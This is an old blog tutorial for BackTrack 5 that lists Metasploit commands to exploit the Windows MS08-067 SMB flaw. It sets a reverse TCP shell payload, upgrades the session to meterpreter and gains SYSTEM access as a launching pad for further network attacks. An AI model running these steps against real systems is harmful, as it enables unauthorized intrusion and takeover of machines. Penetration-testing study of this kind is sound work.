Tuesday 11 September 2012

Command Shell Upgrade On Backtrack 5


 Command Shell Upgrade
COMMAND SHELL UPGRADE

AIM 
  • The aim of this tutorial is to upgrade the  Command Shell into meterpreter  and  make the  perfect launching pad for further attacks into the network .
Open Your '  msfconsole  '
  • To open follow the path ,  BackTrack > Exploitation > Network Exploitation Tools > Metasploit Framework > msfconsole 
  • See the below image for more details -  
MSFCONSOLE


SET EXPLOIT 
  • To set exploit , see the below image - 
  • Command Used : use exploit/windows/smb/ms08_067_netapi
  • See the below image for more details-  
MSFCONSOLE

Set Payload 
  • See the below image how to set the payload .
  • Command Used : set payload windows/shell_reverse_tcp
  • See the below image for more details - 
PAYLOAD

Show Options 
  • See the below image for more details -
SHOW OPTIONS

Set Remote Host and Local Host 
  • Command Used to set Remote Host > set RHOST < Remote Address >
  • Command Used to set Local Host > set LHOST  < Local Address >
  • See the below image for more details - 
SET LHOST , RHOST

Show Options 
  • Command Used : show options 
  • See the below image for more details - 

Exploit Target 
  • Command Used : exploit -z 
  • After exploit , below image shows 1 session is opened .
  • See the below image for more details - 
exploit -z

Session
  • Command Used : sessions -l
  • This command shows the opened session on your backtrack 5.
  • See the below image for more details -
sessions -l

Upgrading Win32 Session into Meterpreter Session 
  •  Metasploit has a feature to upgrade the command shell session to meterpreter session, look at the  -u option. 
  • Command Used : sessions -u 1 
  • At the end ,it shows 2 session opened .
  • See the below image for more details - 
sessions -u 1

See the Sessions 
  • Command Used : sessions -l 
  • When you enter the command , it shows you all the session which is opened . 
  • Here in the below image , it shows the two sessions - 
  1. shell windows
  2. meterpreter
  • See the below image for more details - 
sessions -l

Open Meterpreter Session 
  • To open meterpreter session , enter the command as shown below - 
  • Command Used : sessions -i 2
  • After you press the enter key your meterpreter is started .
  • And when you enter the getuid command , it shows the Server Username as:                                       NT AUTHORITY\SYSTEM.
  • See the below image for more details - 
session -i 2

THIS IS HOW WE CAN UPGRADE THE COMMAND SHELL INTO METERPRETER SHELL

No comments:

Post a Comment